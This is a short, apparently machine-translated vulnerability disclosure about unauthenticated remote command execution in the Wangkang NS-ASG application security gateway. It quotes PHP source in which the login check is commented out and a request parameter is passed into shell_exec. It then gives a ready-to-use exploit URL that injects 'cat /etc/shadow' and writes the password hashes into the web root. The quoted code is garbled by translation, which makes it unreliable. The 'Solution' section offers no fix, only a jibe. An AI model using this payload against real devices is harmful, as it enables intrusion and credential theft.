Wangkang NS-ASG application security gateway Remote Command Execution

Wangkang NS-ASG application security gateway Remote Command Execution

Directly execute remote commands without logon.

Vulnerability

 

<? Php include ("include/common. inc "); include (". /gadgets/lib/FusionCharts. php "); include (". /gadgets/lib/Utilities. php "); // Authenticate ($ USER_ADMIN); switch ($ action) {case" ": list_group (" "); break; case" reboot ": exec ("sudo nohup/sbin/reboot &"); list_group (""); break; case "poweroff": exec ("sudo/sbin/poweroff &"); list_group (""); break; case "getethinfo": $ rtinfo = getRT ($ ethx); // This vulnerability is triggered to track this function echo json_encode ($ r Tinfo); break;} function getRT ($ eth = 'eth0') {$ result = shell_exec ("sudo/sbin/ifconfig $ eth "); // It is executed directly here... $ Ethinfo = array (); preg_match ("/RX packets: \ d +/", $ result, $ rtarr ); $ ethinfo ['rpackets '] = intval (substr ($ rtarr [0], 11); preg_match ("/TX packets: \ d +/", $ result, $ rtarr); $ ethinfo ['tpackets '] = intval (substr ($ rtarr [0], 11); preg_match ("/RX bytes: \ d + /", $ result, $ rtarr); $ ethinfo ['rbytes '] = intval (substr ($ rtarr [0], 9); preg_match ("/TX bytes: \ d +/", $ result, $ rtarr); $ ethinfo ['tbytes '] = intval (substr ($ rtarr [0], 9); return $ ethinfo ;}

The verification method is as follows:

Https://www.xxxxx.com/admin/device_status.php? Action = getethinfo defaults x = a | cat/etc/shadow>/Isc/third-party/httpd/htdocs/test. php

Solution:

Is wangkang's device written by a temporary engineer?